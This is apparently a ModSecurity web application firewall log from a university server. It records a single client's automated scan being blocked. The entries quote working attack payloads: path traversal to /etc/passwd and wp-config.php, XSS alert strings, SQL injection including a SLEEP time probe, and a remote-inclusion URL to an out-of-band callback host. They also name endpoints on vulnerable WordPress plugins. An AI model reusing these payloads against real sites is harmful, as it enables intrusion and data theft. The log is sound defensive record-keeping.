[Tue Aug 29 11:48:00.671169 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14gMCo-f0AAAjy53QAAAAG"]
[Tue Aug 29 11:48:03.356242 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAkdu7AAAAAO"]
[Tue Aug 29 11:48:03.472356 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAj12A4AAAAa"]
[Tue Aug 29 11:48:04.438848 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAjbw6wAAAAW"]
[Tue Aug 29 11:48:05.361217 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkNPskAAAAI"]
[Tue Aug 29 11:48:05.429331 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAjCbOQAAAAB"]
[Tue Aug 29 11:48:06.403322 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkNPtAAAAAI"]
[Tue Aug 29 11:48:06.451755 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAkksHUAAAAA"]
[Tue Aug 29 11:48:07.566483 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjYrCYAAAAK"]
[Tue Aug 29 11:48:08.408061 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjbw7sAAAAW"]
[Tue Aug 29 11:48:09.407712 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAkAL-YAAAAU"]
[Tue Aug 29 11:48:09.451608 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAkAL-gAAAAU"]
[Tue Aug 29 11:48:11.347774 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjbw8kAAAAW"]
[Tue Aug 29 11:48:12.383705 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAjbw9EAAAAW"]
[Tue Aug 29 11:48:12.498731 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN4UAAAAL"]
[Tue Aug 29 11:48:13.463257 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repositoryfh.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThgAAAAH"]
[Tue Aug 29 11:48:13.463296 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThgAAAAH"]
[Tue Aug 29 11:48:18.347932 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14ksCo-f0AAAkdu9wAAAAO"]
[Tue Aug 29 11:48:19.415943 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14k8Co-f0AAAjM7KQAAAAT"]
[Tue Aug 29 11:48:21.431918 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAkrz6YAAAAC"]
[Tue Aug 29 11:48:21.582932 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAjYrEYAAAAK"]
[Tue Aug 29 11:48:21.623617 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7LcAAAAT"]
[Tue Aug 29 11:48:22.395643 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjtc@QAAAAX"]
[Tue Aug 29 11:48:23.938273 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAkrz74AAAAC"]
[Tue Aug 29 11:48:24.513382 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gzfwxgawa6wfd4.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gzfwxgawa6wfd4.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAj12F8AAAAa"]
[Tue Aug 29 11:48:28.050695 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14nMCo-f0AAAkxFxsAAAAV"]
[Tue Aug 29 11:48:31.745555 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAk7QJUAAAAi"]
[Tue Aug 29 11:48:32.352111 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAkaDHMAAAAJ"]
[Tue Aug 29 11:48:33.434968 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAlPmtUAAAAv"]
[Tue Aug 29 11:48:35.411648 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAkAMI0AAAAU"]
[Tue Aug 29 11:48:36.362171 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14pMCo-f0AAAjdQR8AAAAZ"]
[Tue Aug 29 11:48:37.364831 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAkAMJIAAAAU"]
[Tue Aug 29 11:48:38.365155 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14psCo-f0AAAjdQSQAAAAZ"]
[Tue Aug 29 11:48:38.385030 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 